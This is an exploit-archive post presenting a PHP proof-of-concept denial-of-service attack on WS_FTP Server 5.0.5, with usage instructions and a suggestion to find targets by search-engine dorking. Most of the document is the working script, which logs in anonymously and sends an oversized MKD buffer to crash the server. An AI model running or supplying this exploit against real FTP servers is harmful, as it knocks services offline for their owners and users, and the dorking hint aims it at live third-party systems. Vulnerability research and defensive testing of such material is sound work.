=============================================================================================================================================
| # Title     : WS FTP Server 5.0.5 - Denied of Service vulnerability                                                                       |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://ws-ftp-le.software.informer.com/5.0/                                                                                |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This code is for WS_FTP Server 5.0.5 and represents a Denial of Service (DoS) attack.

   (Related : https://packetstorm.news/files/id/176847/ Linked CVE numbers:  ) .
	
[+] save code as poc.php.

[+] Usage = C:\www>php 2.php 127.0.0.1 21

[+] PayLoad :

<?php
// Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS)

function intro() {
  echo "\n-------------------------------------------------------------------------\n";
    echo "--------------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS)  ----\n";
    echo "----------------------------indoushka------------------------------------\n";
}

function main() {
    global $argv;
    
    if (count($argv) < 3) {
        echo "Usage: php script.php <ip> <port>\n";
        exit(-1);
    }

    $ip = $argv[1];
    $port = $argv[2];

    $exploit = str_repeat("\x41", 676); // Fill with A's
    $exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"; // Exploit payload
    $exploit .= str_repeat("\x42", 3000); // Additional padding
    $exploit .= "\r\n";

    // إنشاء الاتصال بالخادم
    $sock = fsockopen($ip, $port, $errno, $errstr, 30);
    if (!$sock) {
        echo "[-] Not connected to $ip:$port: $errstr\n";
        exit(0);
    }

    // قراءة استجابة الخادم
    $response = fread($sock, 1024);
    echo "Connected => $response\n";

    // إرسال بيانات التوثيق
    fwrite($sock, "USER anonymous\r\n");
    $response = fread($sock, 1024);
    echo "Authentication USER: $response\n";

    fwrite($sock, "PASS anonymous\r\n");
    $response = fread($sock, 1024);
    echo "Authentication PASSWORD: $response\n";

    // إرسال الحمولة لاستغلال الثغرة
    fwrite($sock, "MKD " . $exploit);
    $response = fread($sock, 1024);
    echo "Exploited: $response\n";

    fclose($sock);
}

// بداية التنفيذ
intro();
main();
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================